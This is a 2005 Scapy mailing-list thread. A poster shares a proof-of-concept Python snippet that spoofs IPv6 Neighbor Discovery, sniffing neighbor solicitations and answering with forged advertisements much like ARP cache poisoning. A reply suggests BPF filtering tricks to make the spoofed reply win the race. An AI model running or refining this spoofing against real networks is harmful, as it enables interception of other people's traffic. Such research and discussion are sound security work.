questions, bug reports, suggestions, ideas, cool usages of Scapy ()

Tony Doan | 5 Oct 2005 02:51

Scapy performance question

Hi,

I'm working on a proof of concept having to do with IPv6 and Neighbor  
Discovery. The idea is similar to ARP cache poising. The script sits  
in a while(1) looking for a particular type of icmpv6 packet. Then  
tries to respond before the "real" host can to deceive the original  
sender. Unfortunately in it's current incarnation this takes around  
10 hundredths of a second longer than it takes for the "real" host to  
reply and all is lost. Does anyone have any tips on performance  
tuning python and/or scapy or is this just a limitation I  need to  
learn to live with? :)

Here is the script snippet:

while(1):
   r = sniff(filter="icmp6", count=1, promisc=1)
   if r[0].haslayer(ICMPv6):
     if r[0].getlayer(ICMPv6).type == 135:
       srcmac = r[0].getlayer(Ether).src
       srcip = r[0].getlayer(IPv6).src
       sendp( Ether(src=evilmac,dst=srcmac)/IPv6 
(src=evilip,dst=srcip,hoplim=255)/ICMPv6(type=136)/ 
ICMPv6MessageNeighbor(sa=evilip)  )
       print r[0].getlayer(ICMPv6MessageNeighbor).sa

Please note I do the type checking in the scapy script instead of the  
sniff filter due to an ICMPv6 limitation in pcap (even the newest).

Thanks for any ideas.

(Continue reading)

headers

Philippe Biondi | 5 Oct 2005 09:06

Re: Scapy performance question

On Tue, 4 Oct 2005, Tony Doan wrote:

> Please note I do the type checking in the scapy script instead of the sniff 
> filter due to an ICMPv6 limitation in pcap (even the newest).

This is the only way to really improve the code, though. Scapy is a bit 
long do disassemble a packet and will do it for every packet sniffed 
arround, and that's why it increases the socket buffer at its max size. In 
your case, if there is some traffic at the same time, it is possible that 
you lost your match when the packet you're supposed to answer is still in 
the buffer. The only way to really improve performance is to filter as 
much as possible wit BPF filters. You said it's borker for IPv6, but you 
still can put the tests on the ethernet header in a BPF, like source 
MAC and 0x86dd for ethertype.

As a side note, as noted by Arnaud, you can try psyco, but you're racing 
against kernel code, on a simple operation, with a host on the same 
network. Even a C program could loose this one.

--

-- 
Philippe Biondi <phil <at>  secdev.org>      SecDev.org
Computer Security/R&D                   http://www.secdev.org
PGP KeyID:3D9A43E2  FingerPrint:C40A772533730E39330DC0985EE8FF5F3D9A43E2

---------------------------------------------------------------------
Desinscription: envoyez un message a: scapy.ml-unsubscribe <at> secdev.org
Pour obtenir de l'aide, ecrivez a: scapy.ml-help <at> secdev.org